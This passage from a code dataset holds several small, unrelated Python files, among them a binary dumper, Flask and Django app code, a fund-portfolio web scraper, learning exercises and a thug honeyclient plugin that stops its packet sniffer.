'+str(pop_freq[i])+space+str(percentage[i-1]))\n\n\tfile.close()\n\nmain()\n\n\n\n\n","repo_name":"arturoreyes93/Benford-Census","sub_path":"Benford.py","file_name":"Benford.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40282710978","text":"import argparse\n\nparser = argparse.ArgumentParser(\n    description=\"Display the contents of the specified file in binary format.\"\n)\nparser.add_argument(\n    \"filename\", type=str, help=\"name of the file that will be displayed\",\n)\nparser.add_argument(\n    \"--hex\",\n    action=\"store_true\",\n    default=False,\n    help=\"display the content of the file in hexadecimal representation (default: False)\",\n)\nparser.add_argument(\n    \"--offset\",\n    action=\"store\",\n    type=int,\n    default=0,\n    help=\"start reading from a certain offset (default: 0)\",\n)\nparser.add_argument(\n    \"--columns\",\n    action=\"store\",\n    type=int,\n    default=\"8\",\n    help=\"the number of columns that will be displayed (default: 8)\",\n)\nargs = parser.parse_args()\n\nwith open(args.filename, \"rb\") as f:\n    f.seek(args.offset)\n    row = 0\n    col = 0\n    eof = False\n    while not eof:\n        byte = []\n        print(\"{0:>5}\".format(row), end=\": \")\n        for col in range(args.columns):\n            char = f.read(1)\n            if not char:\n                eof = True\n                break\n            byte.append(char)\n\n        for b in byte:\n            print(\"{0:08b}\".format(ord(b)), end=\" \")\n\n        if col != args.columns - 1:\n            print(\" \" * 
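`Mean_Squared_over_true_Error` in the read_in_model record above is a relative-error loss: residuals are divided by the true value (clipped away from zero) before squaring and averaging, so a fixed percentage miss costs the same at any magnitude. A numpy mirror is handy for sanity-checking values outside a Keras session (note the script's final `bestmodel.evaluate(val_x, val_y, ...)` references `val_x`/`val_y` that are never defined in this file, presumably left over from an interactive session):

```python
import numpy as np

def mean_squared_over_true(y_true, y_pred, eps=1e-7):
    # numpy mirror of the Keras loss above; eps plays the role of K.epsilon()
    denom = np.clip(np.abs(y_true), eps, None)
    return np.mean(((y_pred - y_true) / denom) ** 2, axis=-1)

print(mean_squared_over_true(np.array([2.0, 4.0]), np.array([2.2, 3.6])))  # ~0.01: both predictions 10% off
```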
(args.columns - col), end=\"\")\n\n        print(\"|\", end=\" \")\n        for b in byte:\n            b = b.decode()\n            print(b, end=\"\")\n        print(\"\\n\")\n        row += 1\n","repo_name":"Fluxmux/BinDump","sub_path":"bindump.py","file_name":"bindump.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17880049412","text":"foods=[\n    {\"id\":1,\"name\":\"ghee-roast\",\"price\":70,\"category\":\"veg\"},\n    {\"id\":2,\"name\":\"chicken-roast\",\"price\":170,\"category\":\"non-veg\"},\n    {\"id\":3,\"name\":\"cb\",\"price\":170,\"category\":\"non-veg\"},\n    {\"id\":4,\"name\":\"bb\",\"price\":190,\"category\":\"non-veg\"},\n    {\"id\":5,\"name\":\"fried-rice\",\"price\":140,\"category\":\"veg\"},\n    {\"id\":6,\"name\":\"chicken-friedrice\",\"price\":170,\"category\":\"non-veg\"},\n    {\"id\":7,\"name\":\"nan\",\"price\":70,\"category\":\"veg\"},\n    {\"id\":8,\"name\":\"alfham\",\"price\":370,\"category\":\"non-veg\"},\n    \n]\n# total number of items\nprint(len(foods))\n\n# print name whose category = veg\nveg=[f.get(\"name\") for f in foods if f.get(\"category\")==\"veg\"]\nprint(veg)\n\n# food names available under rs 100\nunder_100=[f.get(\"name\") for f in foods if f.get(\"price\")<100]\nprint(under_100)\n\n# costly item\ncostly_food=max(foods,key=lambda f:f.get(\"price\"))\nprint(costly_food)\n\n# costly non-veg food\ncostly_non=max((f for f in foods if f.get(\"category\")==\"non-veg\"),key=lambda f:f.get(\"price\"))\nprint(costly_non)\n\n# print all categories\ncategory={f.get(\"category\") for f in foods}\nprint(category)","repo_name":"nikhiljose13/python_work","sub_path":"dictionary/nested_dicti/food.py","file_name":"food.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3442781752","text":"from selenium import webdriver\nimport cfscrape\nimport time\nimport os\n\n\ndef download(dates, path):\n    file_path = os.path.join(path, 'shriram\\\\')\n    if not os.path.exists(file_path):\n        os.mkdir(file_path)\n\n    chrome_driver = 'chromedriver.exe'\n\n    scraper = cfscrape.create_scraper()\n    chrome_options = webdriver.ChromeOptions()\n    prefs = {\"download.default_directory\": file_path}\n    chrome_options.add_experimental_option(\"prefs\", prefs)\n    driver = webdriver.Chrome(executable_path=chrome_driver, chrome_options=chrome_options)\n    driver.get(\"http://www.shriramamc.com/StatDis-MonthlyPort.aspx\")\n\n    for d in dates:\n        month = d.strftime('%b')\n        year = d.strftime('%Y')\n\n        portfolio_panel = driver.find_element_by_xpath(\n            './/th[contains(text(), \"Monthly Portfolio for the Financial Year\")]')\n        portfolio_panel = portfolio_panel.find_element_by_xpath('ancestor::tbody')\n\n        fin_year1 = year + '-' + str(int(year) + 1)\n        fin_year2 = str(int(year) - 1) + '-' + year\n        flag = 0\n        try:\n            fin_year_panel = portfolio_panel.find_element_by_xpath('.//td[contains(text(), \"' + fin_year1 + '\")]')\n            fin_year_panel = fin_year_panel.find_element_by_xpath('preceding-sibling::td//img')\n            fin_year_panel.click()\n            time.sleep(2)\n            fin_year_panel = fin_year_panel.find_element_by_xpath('ancestor::tr/following-sibling::tr')\n            file = fin_year_panel.find_element_by_xpath('.//td[contains(text(),\"' + month + '\") \\\n                                                        and contains(text(),\"' + year + '\")]')\n\n            flag = 1\n        except:\n            pass \n        if flag == 0:\n            try:\n                fin_year_panel = portfolio_panel.find_element_by_xpath('.//td[contains(text(), \"' + fin_year2 + '\")]')\n                fin_year_panel = 
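One more note on bindump.py above: it defines a `--hex` flag but never reads `args.hex` in the dump loop, so the flag is currently a no-op. Honoring it only needs the per-byte formatter to switch base and width; a small helper sketch (inside the loop it would replace the hard-coded `"{0:08b}"` with `render_byte(ord(b), args.hex)`):

```python
def render_byte(value, as_hex=False):
    # one byte (an int 0..255) -> "00011111" in binary mode or "1f" in hex mode
    return format(value, "02x" if as_hex else "08b")

assert render_byte(0x1F) == "00011111"
assert render_byte(0x1F, as_hex=True) == "1f"
```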
fin_year_panel.find_element_by_xpath('preceding-sibling::td//img')\n fin_year_panel.click()\n time.sleep(2)\n fin_year_panel = fin_year_panel.find_element_by_xpath('ancestor::tr/following-sibling::tr')\n file = fin_year_panel.find_element_by_xpath('.//td[contains(text(),\"' + month + '\") \\\n and contains(text(),\"' + year + '\")]')\n except:\n continue \n\n file.find_element_by_xpath('following-sibling::td//input').click()\n time.sleep(10)\n\n save_file_name = \"shriram_portfolios_\" + d.strftime('%Y%m') + '.xls'\n print('Downloading file for Shriram for ' + d.strftime('%b%Y'))\n file_name = max([file_path + f for f in os.listdir(file_path)], key=os.path.getctime)\n os.rename(os.path.join(file_path, file_name), os.path.join(file_path, save_file_name))\n\n driver.refresh()\n time.sleep(3)\n\n driver.close()\n","repo_name":"anshuljn30/mf_download","sub_path":"download_shriram_holdings.py","file_name":"download_shriram_holdings.py","file_ext":"py","file_size_in_byte":2888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12653575783","text":"from flask import Flask, json, request, jsonify\nfrom flask_cors import CORS\nfrom RawCat import RawCat\n\ngps = {\"gps\": {\"location\": {\"longitude\": 11.924482585745864, \"latitude\": 57.5726428059939}, \"course\": 45}}\nrouteInfo = {\"longitude\": 11.924482585745864, \"latitude\": 57.5726428059939, \"course\": 45, \"refcourse\": 45, \"goallongitude\": 11.467781080864368, \"goallatitude\": 58.19432362991195,}\napi = Flask(__name__)\nCORS(api)\n\nrawcat = RawCat()\n\n@api.route('/route', methods=['GET'])\ndef get_route():\n json_data = None\n with open('route.json', 'r') as j:\n json_data = json.load(j)\n\n settings = None\n with open('settings.json', 'r') as j:\n settings = json.load(j)\n if(request.args.get('goalIndex') != None):\n print(\"goal:\" + request.args.get('goalIndex'))\n settings['route']['goalIndex'] = int(request.args.get('goalIndex'))\n \n with open('settings.json', 'w') as outfile:\n json.dump(settings, outfile)\n\n rawcat.updateRoute()\n\n return jsonify(json_data)\n\n\n@api.route('/route', methods=['POST'])\ndef post_route():\n settings = None\n with open('settings.json', 'r') as j:\n settings = json.load(j)\n\n if(request.args.get('keepIndex') != None and request.args.get('keepIndex') != \"true\"):\n settings['route']['goalIndex'] = 0\n \n with open('settings.json', 'w') as outfile:\n json.dump(settings, outfile)\n\n requestjson = json.loads(request.data)\n\n with open('route.json', 'w') as outfile:\n json.dump(requestjson, outfile)\n\n rawcat.updateRoute()\n return jsonify(requestjson)\n\n\n@api.route('/gps', methods=['GET'])\ndef get_gps():\n return json.dumps(gps)\n\n\n@api.route('/routeInfo', methods=['GET'])\ndef get_routeInfo():\n return json.dumps(routeInfo)\n\n\n@api.route('/all', methods=['GET'])\ndef get_all():\n data = None\n with open('data.json', 'r') as j:\n data = json.load(j)\n\n settings = None\n with open('settings.json', 'r') as j:\n settings = json.load(j)\n \n allData = {\"data\": data, \"settings\": settings}\n\n return json.dumps(allData)\n\n\n@api.route('/data', methods=['GET'])\ndef get_data():\n json_data = None\n with open('data.json', 'r') as j:\n json_data = json.load(j)\n return jsonify(json_data)\n\ndef boolConverter(b):\n if(b == \"true\" or b == \"True\"):\n return True\n return False\n\n@api.route('/rudder', methods=['GET'])\ndef get_rudder():\n darkMode = request.args.get('darkMode')\n ref = request.args.get('ref')\n \n settings = 
None\n with open('settings.json', 'r') as j:\n settings = json.load(j)\n\n if(darkMode != None):\n settings['rudder']['darkMode'] = boolConverter(darkMode)\n\n if(ref != None):\n settings['rudder']['ref'] = int(ref)\n\n with open('settings.json', 'w') as outfile:\n json.dump(settings, outfile)\n \n return jsonify(settings['rudder'])\n\n@api.route('/controller', methods=['GET'])\ndef get_controller():\n type_v = request.args.get('type')\n r = request.args.get('r')\n settings = None\n with open('settings.json', 'r') as j:\n settings = json.load(j)\n\n if(type_v != None):\n settings['controller']['type'] = type_v\n if(r != None):\n settings['controller']['refCourse'] = r\n if(request.args.get('reflatitude') != None):\n settings['controller']['reflocation']['latitude'] = request.args.get('reflatitude')\n if(request.args.get('reflongitude') != None):\n settings['controller']['reflocation']['longitude'] = request.args.get('reflongitude')\n\n with open('settings.json', 'w') as outfile:\n json.dump(settings, outfile)\n \n return jsonify(settings['controller'])\n\n\n@api.route('/settings', methods=['GET'])\ndef get_settings():\n json_data = None\n with open('settings.json', 'r') as j:\n json_data = json.load(j)\n\n return jsonify(json_data)\n\n\n@api.route('/settings', methods=['POST'])\ndef post_settings():\n requestjson = json.loads(request.data)\n with open('settings.json', 'w') as outfile:\n json.dump(requestjson, outfile)\n return jsonify(requestjson)\n\n@api.route('/phone', methods=['POST'])\ndef post_phone():\n settings = None\n with open('settings.json', 'r') as j:\n settings = json.load(j)\n settings['controller']['refCourse'] =request.json[\"locationMagneticHeading\"]\n with open('settings.json', 'w') as outfile:\n json.dump(settings, outfile)\n requestjson = json.loads(request.data)\n with open('phone.json', 'w') as outfile:\n json.dump(requestjson, outfile)\n return jsonify(requestjson)\n\nif __name__ == '__main__':\n # api.run()\n api.run(host=\"0.0.0.0\")\n\n\n","repo_name":"edvinag/rawweb","sub_path":"mock/mock.py","file_name":"mock.py","file_ext":"py","file_size_in_byte":4410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22330027576","text":"import uuid\n\nfrom django.conf import settings\nfrom django.contrib import auth, messages\nfrom django.contrib.auth.models import User\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.core.mail import send_mail\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.urls import reverse\nfrom profile_app.models import Designation, Employee\n\nfrom ..forms import EmployeePrileAppForm, UserProfileAppForm\n\n\ndef getFunction(request):\n form_list = [UserProfileAppForm, EmployeePrileAppForm]\n return render(request, \"base_app/register.html\", {\n \"forms\" : form_list,\n })\n\ndef postFunction(request):\n user_form = UserProfileAppForm(request.POST)\n emp_form = EmployeePrileAppForm(request.POST, request.FILES)\n\n if user_form.is_valid() and emp_form.is_valid():\n username = user_form.cleaned_data['username']\n first_name = user_form.cleaned_data['first_name']\n last_name = user_form.cleaned_data['last_name']\n email = user_form.cleaned_data['email']\n password = user_form.cleaned_data['password']\n designation = emp_form.cleaned_data['designation']\n image = emp_form.cleaned_data['image']\n\n if User.objects.filter(email=email).first():\n messages.warning(request, \"Email is already taken!\")\n return 
HttpResponseRedirect(reverse(\"register\"))\n\n auth_token = str(uuid.uuid4())[:4]\n user_obj = User.objects.create_user(username, email, password, first_name=first_name, last_name=last_name)\n\n designation_obj = Designation.objects.get(position=designation)\n\n employee_obj = Employee(user=user_obj, auth_token=auth_token, designation=designation_obj, image=image)\n employee_obj.save()\n\n send_verification_mail(request, username, email, auth_token)\n\n return HttpResponseRedirect(reverse(\"token\"))\n else:\n messages.warning(request, \"Username is already taken!\")\n return HttpResponseRedirect(reverse(\"register\"))\n\ndef send_verification_mail(request, username, email, token):\n subject = \"Welcome to Software Giant\"\n current_domain = get_current_site(request)\n message = f\"Hi {username}, thank you for registering in Software Giant and click the link to verfiy your email {current_domain}/verfiy/{token}\"\n email_form = settings.EMAIL_HOST_USER\n recipient_list = [email,]\n send_mail(subject, message, email_form, recipient_list)\n\n\ndef logout(request):\n auth.logout(request)\n\n","repo_name":"istiakahmad62/Company-Attendance-System","sub_path":"base_app/helper_function_modules/register_helper.py","file_name":"register_helper.py","file_ext":"py","file_size_in_byte":2498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"69937478562","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nx, y = [], []\n\nfor i in open(\"prices.txt\", \"r\"):\n _x, _y = i.split(\",\")\n x.append(float(_x))\n y.append(float(_y))\n\nx, y = np.array(x), np.array(y)\n\nx = (x - x.mean()) / x.std()\n\n# 在(-2,4)区间取100个点作为画图基础\nx0 = np.linspace(-2, 4, 100)\n\n\n# n 是模型多项式次数\n# 返回的模型根据输入的下(默认是x0), 返回相对的预测的y\ndef getModel(n):\n return lambda input_x=x0: np.polyval(np.polyfit(x, y, n), input_x)\n\n\n# 根据参数的n, 输入的x, y 返回相对于的损失\ndef getCost(n, input_x, input_y):\n return 0.5 * ((getModel(n)(input_x) - input_y) ** 2).sum()\n\n\ntest_set = (1, 4, 10)\n\n# 损失看起来n=10最好,但是图看起来n=1最好, 可知n=10是 过拟合\nfor i in test_set:\n print(getCost(i, x, y))\n\nplt.figure()\nplt.scatter(x, y, c=\"g\", s=20)\nfor test in test_set:\n plt.plot(x0, getModel(test)(), label=\"degree = {}\".format(test))\n\nplt.xlim(-2, 4)\n\nplt.ylim(1e5, 8e5)\nplt.legend()\nplt.show()\n","repo_name":"Lyn4444/machineLearningTest","sub_path":"sample1/ch1.py","file_name":"ch1.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29333165639","text":"import utilityFunctions as utilityFunctions\n\ndef perform(level, box, options):\n\tfloorPlans = [\n\t\t[\n\t\t\t[0, 0, 0, 0, 0],\n\t\t\t[0, 1, 1, 1, 0],\n\t\t\t[0, 1, 1, 1, 0],\n\t\t\t[0, 1, 1, 1, 0],\n\t\t\t[0, 0, 0, 0, 0]\n\t\t]\n\t]\n\thouse = House(box.minx, box.minz, box.miny, 4, floorPlans)\n\thouse.build()\n\nclass House:\n\tbeamBlock = (17,0)\n\tconstructionPlans = []\n\n\tdef __init__(self, xStart, zStart, baseHeight, floorHeight, floorPlans = []):\n\t\tself.xStart = xStart\n\t\tself.zStart = zStart\n\t\tself.baseHeight = baseHeight\n\t\tself.floorHeight = floorHeight\n\t\tself.floorPlans = floorPlans\n\t\n\tdef createConstructionPlans(self):\n\t\tfor floor in self.floorPlans:\n\t\t\tconstructionFloor = []\n\t\t\tfor line in floor:\n\t\t\t\tconstructionFloorLine = []\n\t\t\t\tfor block in line:\n\t\t\t\t\tif (block == 0):\n\t\t\t\t\t\tconstructionFloorLine.append({\"outside\", 
\"\"})\n\t\t\t\t\telse:\n\t\t\t\t\t\tconstructionFloorLine.append({\"inside\", \"\"})\n\t\t\t\tconstructionFloor.append(constructionFloorLine)\n\t\t\tself.constructionPlans.append(constructionFloor)\n\t\n\tdef build(self):\n\t\tprint('yo')","repo_name":"Nequilich/GDMC-Filters","sub_path":"Temp/GenerateHouse.py","file_name":"GenerateHouse.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1881147986","text":"# coding=utf-8\nfrom django import forms\nfrom django.utils import timezone\nfrom django.core.validators import validate_email\nfrom django.core.exceptions import ValidationError\nfrom .models import FollowUp\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Layout, Fieldset, ButtonHolder, Submit, HTML, Button, Div\nfrom crispy_forms.bootstrap import TabHolder, Tab, Alert, FieldWithButtons, StrictButton\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.conf import settings\n\nclass LanguageForm(forms.Form):\n language = forms.ChoiceField(choices = settings.LANGUAGES, required=True, label='Change language / Cambiar el idioma / Changer la langue')\n\n def __init__(self, *args, **kwargs):\n super(LanguageForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper(self)\n self.helper.form_class = 'form-horizontal'\n self.helper.label_class = 'col-sm-5 col-md-5 col-lg-5'\n self.helper.field_class = 'col-sm-4 col-md-4 col-lg-4'\n self.helper.layout = Layout(\n FieldWithButtons(\n 'language',\n StrictButton('Change language ', type='submit', name='change_language', css_class=\"btn-success\"),\n ),\n )\n\n\nclass FollowUpForm(forms.ModelForm):\n\n class Meta:\n model = FollowUp\n localized_fields = '__all__'\n fields = ('familiarity',\n 'rating',\n 'incident_date_1','incident_text_1',\n 'incident_date_2','incident_text_2',\n 'incident_date_3','incident_text_3',\n 'incident_date_4','incident_text_4',\n 'incident_date_5','incident_text_5',\n 'attention',\n 'intervention',\n 'impact',\n 'further_comments',\n 'want_informed',\n 'contact_again',\n 'email_address',\n )\n widgets = {\n 'rating': forms.RadioSelect(),\n 'familiarity': forms.RadioSelect(),\n 'attention': forms.RadioSelect(),\n 'intervention': forms.RadioSelect(),\n 'impact': forms.Textarea(attrs={'rows': 3,\n 'cols': 40,\n 'style': 'height: 8em;'}),\n 'incident_text_1' : forms.Textarea(attrs={'rows': 3,\n 'cols': 40,\n 'style': 'height: 8em;'}),\n 'incident_text_2' : forms.Textarea(attrs={'rows': 3,\n 'cols': 40,\n 'style': 'height: 8em;'}),\n 'incident_text_3' : forms.Textarea(attrs={'rows': 3,\n 'cols': 40,\n 'style': 'height: 8em;'}),\n 'incident_text_4' : forms.Textarea(attrs={'rows': 3,\n 'cols': 40,\n 'style': 'height: 8em;'}),\n 'incident_text_5' : forms.Textarea(attrs={'rows': 3,\n 'cols': 40,\n 'style': 'height: 8em;'}),\n 'further_comments' : forms.Textarea(attrs={'rows': 3,\n 'cols': 40,\n 'style': 'height: 8em;'}),\n }\n\n def __init__(self, *args, **kwargs):\n super(FollowUpForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper(self)\n self.helper.form_class = 'form-horizontal'\n self.helper.label_class = 'col-sm-3 col-md-3 col-lg-3'\n self.helper.field_class = 'col-sm-9 col-md-9 col-lg-9'\n self.helper.layout = Layout(\n Div(\n Div(\n HTML(_('1. Familiarity')),\n css_class = 'panel-heading'\n ),\n Div(\n HTML(_(\"
How familiar are you with the case of {{ form.instance.case.name }} in the one year period after {{ form.instance.case.date_intervention }}?
\")),\n 'familiarity',\n HTML(_(\"
Note: Even if you only have little or incomplete information, please try to answer all questions based on the knowledge you have.
\")),\n css_class = 'panel-body'\n ),\n css_class = 'panel panel-info'\n ),\n Div(\n Div(\n HTML(_('2. Development of the situation')),\n css_class = 'panel-heading'\n ),\n Div(\n HTML(_(\"
How would you describe the development of the case of {{ form.instance.case.name }} in the one year period after {{ form.instance.case.date_intervention }}, in light of the incidents listed above that occurred before the action of the Special Rapporteur?
\")),\n HTML(_(\"
We recommend you look at this table to ensure consistency in responses. The table lists various examples and explains how to rate developments of a case depending on the initial situation.
\")),\n 'rating',\n css_class = 'panel-body'\n ),\n css_class = 'panel panel-info'\n ),\n Div(\n Div(\n HTML(_('3. Significant incidents')),\n css_class = 'panel-heading'\n ),\n Div(\n HTML(_(\"
Please list all known significant incidents that occurred in the one year period after {{ form.instance.case.date_intervention }}. If there were more than 5, please concentrate on the most important ones:
\")),\n TabHolder(\n Tab(\n _('Incident #1'),\n 'incident_date_1',\n 'incident_text_1'\n ),\n Tab(\n _('Incident #2'),\n 'incident_date_2',\n 'incident_text_2',\n ),\n Tab(\n _('Incident #3'),\n 'incident_date_3',\n 'incident_text_3',\n ),\n Tab(\n _('Incident #4'),\n 'incident_date_4',\n 'incident_text_4',\n ),\n Tab(\n _('Incident #5'),\n 'incident_date_5',\n 'incident_text_5',\n ),\n ),\n css_class = 'panel-body'\n ),\n css_class = 'panel panel-info'\n ),\n Div(\n Div(\n HTML(_('4. International attention')),\n css_class = 'panel-heading'\n ),\n Div(\n HTML(_(\"
Do you believe that the international attention given to the case of {{ form.instance.case.name }} had an impact on the development of his/her situation in the one year period after {{ form.instance.case.date_intervention }}?
\")),\n 'attention',\n css_class = 'panel-body'\n ),\n css_class = 'panel panel-info'\n ),\n Div(\n Div(\n HTML(_('5. Special Rapporteur\\'s intervention')),\n css_class = 'panel-heading'\n ),\n Div(\n HTML(_(\"
Do you believe that the intervention of the Special Rapporteur had a distinguishable impact on this case (amidst broader international attention)?
\")),\n 'intervention',\n css_class = 'panel-body'\n ),\n css_class = 'panel panel-info'\n ),\n Div(\n Div(\n HTML(_('6. Impact of the attention')),\n css_class = 'panel-heading'\n ),\n Div(\n HTML(_('
Please provide as much detail as possible on what makes you come to your conclusion on question (4) and (5), as well as on what kind of impact the attention had (if any):
')),\n 'impact',\n css_class = 'panel-body'\n ),\n css_class = 'panel panel-info'\n ),\n Div(\n Div(\n HTML(_('7. Further comments/feedback')),\n css_class = 'panel-heading'\n ),\n Div(\n 'further_comments',\n css_class = 'panel-body'\n ),\n css_class = 'panel panel-info'\n ),\n Div(\n Div(\n HTML(_('8. Voluntary contact information')),\n css_class = 'panel-heading'\n ),\n Div(\n 'want_informed',\n 'contact_again',\n 'email_address',\n css_class = 'panel-body'\n ),\n css_class = 'panel panel-info'\n ),\n Div(\n Div(\n HTML(_('Submission')),\n css_class = 'panel-heading'\n ),\n Div(\n Alert(content=_('Warning! You can only submit this form once. After your submission the link will be deactivated.'), css_class=\"alert-danger\"),\n HTML(_(\"
Thank you for your contribution!
\")),\n StrictButton(_('Submit '), type='submit', name='save', css_class=\"btn-primary\"),\n css_class = 'panel-body'\n ),\n css_class = 'panel panel-primary'\n ),\n )\n\n def clean(self):\n super(FollowUpForm,self).clean()\n if bool(self.cleaned_data['want_informed']) or bool(self.cleaned_data['contact_again']):\n try:\n validate_email(self.cleaned_data['email_address'])\n except ValidationError:\n raise ValidationError(_(\"Please fill the e-mail address field if you wish to receive information.\"))\n\n def save(self, commit=True, *args, **kwargs):\n instance = super(FollowUpForm, self).save(commit=False, *args, **kwargs)\n instance.timestamp = timezone.now()\n instance.is_answered = True\n if commit:\n instance.save()\n return instance\n \n","repo_name":"simonspa/django-datacollect","sub_path":"datacollect/questionnaire/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":11087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"11842379450","text":"# -*- codeing = utf-8 -*-\n# @Time : 2023/4/11 9:44\n# @Author : LHJ青梦\n# @File : demo03.py\n# @Software: PyCharm\n\n\nimport jieba\nf = open(\"沉默的羔羊.txt\", 'r', encoding='utf-8')\nls = jieba.lcut(f.read())\n\n#ls = f.read().split()\nd = {}\nfor w in ls:\n d[w] = d.get(w, 0) + 1\n'''\n# print(type(ls))\nprint(ls)\nprint('-----------------')\n# print(type(d))\nprint(d)\nprint('--------------------')\n'''\nmaxc = 0\nmaxw = \"\"\nfor k in d:\n if d[k] > maxc and len(k) > 2:\n maxc = d[k]\n maxw = k\n if d[k] == maxc and len(k) > 2 and k > maxw:\n maxw = k\nprint(maxw)\nf.close()\n\n'''\n这段代码是一个简单的文本分析程序,目的是找到一个文本中出现次数最多的词语。\n\n具体的解释如下:\n\n导入了 jieba 模块,用于对文本进行分词。\n打开一个名为 \"沉默的羔羊.txt\" 的文件。\n通过 jieba.lcut() 函数对文件内容进行分词,得到一个分词列表 ls。\n创建一个空字典 d,用于存储每个词语出现的次数。\n遍历分词列表 ls,对于每个词语 w,如果 w 已经在字典 d 中,就将其出现次数加一,否则将其添加到字典 d 中,并将其出现次数初始化为 1。\n创建两个变量 maxc 和 maxw,用于记录出现次数最多的词语和该词语的出现次数。\n再次遍历字典 d,对于每个词语 k,如果 k 的出现次数大于 maxc 且 k 的长度大于 2,就将 maxc 和 maxw 更新为当前的值。如果 k 的出现次数等于 maxc 且 k 的长度大于 2 且 k 的字典序比 maxw 大,就将 maxw 更新为当前的值。\n输出出现次数最多的词语 maxw。\n关闭文件。\n'''","repo_name":"Leshj2003/python","sub_path":"code/Learning/序列数据结构、集合及字典/demo03.py","file_name":"demo03.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28935750291","text":"#!/usr/bin/env python\n#\n# StartSniffer.py\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2 as\n# published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place, Suite 330, Boston,\n# MA 02111-1307 USA\n\n\nimport base64\nimport os\nimport zope.interface\nfrom .IPlugin import IPlugin\n\nclass Handler:\n zope.interface.implements(IPlugin)\n\n def run(self, thug, log):\n log.info(\"[Plugins][StopSniffer] Stopping sniffer\")\n sniffer = getattr(log, 'sniffer', None)\n if sniffer and not sniffer.poll():\n try:\n log.debug(\"[Plugins][StopSniffer] Gracefully terminating process\")\n sniffer.terminate()\n log.debug(\"[Plugins][StopSniffer] Process terminated gracefully\")\n except:\n try:\n if not sniffer.poll():\n log.debug(\"[Plugins][StopSniffer] Killing sniffer\")\n sniffer.kill()\n except OSError as e:\n log.debug(\"[Plugins][StopSniffer] Error killing sniffer: %s. Continue\", e)\n pass\n except Exception as e:\n log.exception(\"[Plugins][StopSniffer] Unable to stop the sniffer with pid %d: %s\",\n sniffer.pid, e)\n\n mongoLogger = log.ThugLogging.modules.get('mongodb', None)\n if mongoLogger and mongoLogger.enabled:\n db = mongoLogger.urls.database\n if os.path.isfile(log.sniffer_filename):\n with open(log.sniffer_filename, 'rb') as i:\n content = i.read()\n\n os.unlink(log.sniffer_filename)\n\n content_id = mongoLogger.fs.put(base64.b64encode(content)) if content else None\n pcap = {\n 'analysis_id' : mongoLogger.analysis_id,\n 'content_id' : content_id,\n 'mime-type' : 'application/vnd.tcpdump.pcap',\n }\n db.pcaps.insert(pcap)\n\n log.info(\"[Plugins][StopSniffer] PCAP successfully added to Mongo\")\n","repo_name":"pdelsante/thug-dockerfile","sub_path":"Plugins/StopSniffer.py","file_name":"StopSniffer.py","file_ext":"py","file_size_in_byte":2570,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"7771914360","text":"#import modules\nimport cv2 #pip install opencv-ython\nimport os\nimport mahotas #pip install mahotas\nimport numpy as np #pip install numpy\nimport glob\nfrom scipy.spatial import distance as dist #pip install scipy\nfrom matplotlib import pyplot as plt #pip install matplotlib\nimport csv\n\n#define function to return contour and Zernike moments from an image of a nanosheet\n#Note MoS2 image dataset requires erosion and dilation of 1 pixel from external contour to prevent merging of neighbouring features\ndef get_moments(filename):\n zernikeMoments = [] #initialise list to store zernike moments\n \n image = cv2.imread(filename) #read image\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY) #convert to grayscale\n blurred = cv2.GaussianBlur(gray, (7, 7), 2.5) #blur\n thresh = cv2.threshold(blurred, 0, 255, cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)[1] #convert to binary\n \n #find contours, sort by area, grab largest contour\n cnts, hierarchy = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n sorted_cnts = sorted(cnts, key=cv2.contourArea, reverse = True)\n cnts = sorted_cnts[0]\n \n #create an empty mask for the contour and draw filled contour\n mask = np.zeros(image.shape[:2], dtype=\"uint8\")\n cv2.drawContours(mask, [cnts], -1, 255, -1)\n \n #extract bounding rectangle of contour, use it to crop roi from mask.\n (x, y, w, h) = cv2.boundingRect(cnts)\n roi = mask[y:y + h, x:x + w]\n\n kernel = np.ones((3,3), np.uint8) #set kernel\n\n mask = cv2.erode(mask, kernel) #erode 1 pixel from external contour\n\n #find contours, 
